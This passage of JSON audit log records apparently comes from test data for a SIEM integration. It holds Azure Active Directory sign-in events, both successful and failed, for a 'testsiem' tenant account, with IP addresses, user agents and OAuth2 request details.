"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0c8fcffc-a810-4a85-b8e2-3a2fda925c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "6f2b7716-1acc-450d-ae13-afad7e02d07e"} +{"InterSystemsId": "4542ce7e-270b-435e-8f81-ee23ea74be75", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": 
"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9718abaa-220e-49c5-8c9b-588d32b8db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "47f3c440-3fb7-4b5e-9c20-455470b289d2"} +{"InterSystemsId": "4836e306-1460-4f34-ab55-a74c9a14f50d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:38:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2fde8302-c39e-40b6-9c7f-1bb9d4800a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": 
"ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5a3435d0-229a-41c8-bd21-b4f2b662d0f6"} +{"InterSystemsId": "4a50a549-adf3-4a22-9037-7fd8cd3d0116", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1d856a16-b179-41ab-9c0d-af1d2b925100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5aff2d1c-b203-46a6-96f0-b8f908f0e968"} +{"InterSystemsId": "4e44a55e-9c0d-4cea-b000-1b79e96dcf57", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, 
"ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fc33c54e-38b9-4ef2-a4ee-a3a324a45500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3d8033cf-eecd-4eee-87a5-795efd8a1d3d"} +{"InterSystemsId": "4e91c3e1-819e-4ebc-ae68-2037cfc2db92", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:25", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": 
"a063e495-5883-4837-8186-5828f9f2d500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8bd0a250-74f6-4eeb-ba20-c5bdbd977013"} +{"InterSystemsId": "50d648cb-466d-4cf4-b2f8-3b7e84f47040", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:04", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "64613cae-510d-4a52-b486-070b775e5800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": 
"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558"} +{"InterSystemsId": "5a453031-0cc3-4577-a589-4c3bf37eed78", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "814a32f0-27fd-4e82-855c-13da15a4c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "19d57a4a-d32e-4dc6-971f-3491bc440023"} +{"InterSystemsId": "5cd6215d-e206-4c3f-805d-6e386cbdab7a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9c218a27-ed51-4011-8383-e76850e85000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "0b158f74-e223-43c8-9cfd-5f4442f29fc7"} +{"InterSystemsId": "612b339f-1088-a000-f25f-9c8af4d57894", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "00000003-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4819a0c2-2050-4549-ab66-f5b90cbbcc5a"} +{"InterSystemsId": "61eb5713-2687-4c00-a7b2-fde4788c395b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:29", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3db9a461-6dd1-4950-b3e3-fbe8c2d5c700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e94002d9-f6e8-46f9-8702-2a29e908e73d"} +{"InterSystemsId": "61f81224-65fd-4c1b-b388-ee0e25485191", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", 
"Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "dc0cc415-9a00-470d-bda3-867e11fdd400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1ca4f684-3a34-44a8-99b8-064d1071768a"} +{"InterSystemsId": "661f2330-3e04-483d-9781-caaa4543cc13", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", 
"Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "01c15486-46e2-487a-91f5-11445da0b600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2"} +{"InterSystemsId": "68d7eaa4-aa57-4508-9792-09e80c911aa1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:42", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6"}], "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1590b91f-bffe-4cd8-9028-de52692f5400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": 
"KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b290b902-b6f2-49f6-b7f8-ea1541d85c8c"} +{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:42:59", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "LogonError": "FlowTokenExpired", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f54da4fe-0a54-45f3-b6ea-39f873eb6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b0c1c4a7-c6db-4f14-b628-54e37a7a6785"} +{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, 
"ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "7fa5e138-ac87-4063-a278-56c6c6965e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "82d834e4-f6f2-476a-902e-e1e9fd6f87d8"} +{"InterSystemsId": "6b9a8662-857f-45e4-bbb2-d106d5aab41e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:19", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "216.160.83.57", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0fee3b91-5e56-45f6-9b3c-792602b1e500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": 
"ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e5e2c41a-55ea-4681-9d64-78ddd7145bd2"} +{"InterSystemsId": "6bab76a8-98bd-42e4-b722-a31fe81b030a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c3ebcde8-62f6-4cc4-8e0c-c11c08e76100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": 